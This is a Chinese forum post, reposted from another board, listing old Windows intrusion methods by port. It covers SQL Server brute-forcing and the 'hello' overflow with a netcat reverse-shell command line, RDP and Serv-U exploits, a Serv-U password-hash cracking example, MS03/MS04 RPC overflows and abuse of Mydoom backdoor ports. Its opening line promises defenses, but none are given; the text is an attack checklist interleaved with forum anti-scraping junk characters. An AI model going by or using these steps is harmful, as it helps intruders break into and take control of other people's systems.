该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
) @+ y7 m% G/ @ W4 S
3 s$ K. }1 J0 z0 h7 ]2 Z
+ J5 s Q$ L+ W3 |" T 1. 1433端口入侵
5 B$ o: ~% O( A; V9 p) |- g7 l
1 e6 l& F7 ~- A) Z- B/ [& X scanport.exe 查有1433的机器
. I w% W. T+ ]8 v, ^ n& \& |$ a! ], i4 _) |2 m
SQLScanPass.exe 进行字典暴破(字典是关键) " h( H6 F* ~, J$ ]
9 V6 X4 c X& n+ s3 }7 O
最后 SQLTools.exe入侵 2 E! i7 \6 }. g7 i
" l* j5 f4 h0 P5 S* ^
============================= 3 p y/ Y( k0 }" w0 {
8 K' u" j1 Y4 X* P
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 , L* ^6 w. T# {! A2 n
8 t4 c9 `9 ]2 G+ \6 ` |% k* a
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
m4 ]$ n, t7 `. F! ^8 j- ^! D- P+ x4 k, x5 R0 k! ?+ i3 @
(以上反向的,测试成功) ( A, N3 z, T$ v
7 {, V. f" p- u& j sqlhelloz.exe 入侵ip 1433 (这个是正向连接) & ^) o( |" D: H
# G3 v1 Q6 d! s4 i' k' }" q
2. 4899端口入侵 ! k; w3 K$ H2 H$ ~, Q) S9 f$ `
0 u+ q, i; u& M! G: L t6 | 用4899过滤器.exe,扫描空口令的机器 8 G2 ~5 D9 S) w+ Q$ r3 h
, w W( o# L% V3 s
3. 3899的入侵 4 e2 q8 ?1 F5 p, U% @: f7 _
" @1 q; {3 f- \' N A" f
对很早的机器,可以试试3389的溢出(win3389ex.exe) ) g; P6 }3 E; r; L- C- R
6 J. e2 [7 c0 M
对2000的机器,可以试试字典暴破。(tscrack.exe) & M0 x' r" h+ T& ] v/ K
( w( @, g* X6 y6 _. h1 L- {" X
4. 80入侵
4 O4 G) E, i W5 @) q
( | s* X% H I( a: X. L( J 对sp3以前的机器,可以用webdav入侵;
1 `/ u6 Y+ m; ~
V* m9 q' l7 ~& c7 y 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) $ R1 f+ ]; \0 W& d% O/ y3 {( T
/ `# u1 W; R5 c. B0 a' @8 q
可以利用SQL进行注入。(小榕的注入软件)。 / N8 ~* G, s6 Y P3 x
+ o; P/ D \4 X: R0 |' L
5. serv-u入侵(21端口)
1 K+ L/ S% r' L; O: s2 ^! f6 Z5 N
' i6 z7 @3 K* N 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) ( |% ^4 i5 P! `" w" f1 c. Y
* E; d ^2 C7 D
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 2 L9 s' W3 S; `! g/ {" E
+ u; H# J" L- J6 y- z% M
====================================== & S5 `& W6 u7 T3 ~" y( J% Z+ ]! U
6 {. R0 y6 M- {+ l4 _
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
3 w3 F4 m1 p# p% u, Q- \# f* V, {1 W) Z: f0 [
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
\$ s$ K5 ?& I/ j. r5 c% r 8 t6 a" G& }: @
6. 554端口
& e2 k0 I, |7 w9 F! y, \, g3 `1 t0 p2 a( T( V; y
用real554.exe入侵。
7 o/ Q2 \# f+ j+ d: u " B6 c4 K6 H& }+ b
7. 6129端口
h2 t8 X; J# s
3 Z3 q, z' v3 H( q8 m0 p6 M; G' c 用DameWare6129.exe入侵。
8 @7 u9 ~7 T6 C. P9 ?* _% [) _* {* s
8. 系统漏洞 , [5 u e( `' R0 S' T: U* j5 @6 {
+ x- f: y& ?/ _2 [1 K) `% }
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
. V% x/ D, T6 W4 }( j! e) Q
8 s, K0 c6 Z7 V# G L0 P" m 进行溢出入侵。
; L1 q7 X: w& g7 {
' r8 V4 n: z0 o+ B/ H 9. 3127等端口
4 ^/ r8 f2 `9 H6 f. i) h: T& s3 \+ X, \' k5 J+ |
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 " Q. P, g4 A- N n5 I
J/ {! V. [% I) L
10. 其他入侵 . B' z# m6 K% [5 Q
- ^/ ?( ~; F% ]7 D
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。+ ]4 x' u1 f* x" T/ M8 _
: h- T P4 r6 W) Q: m+ k
转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|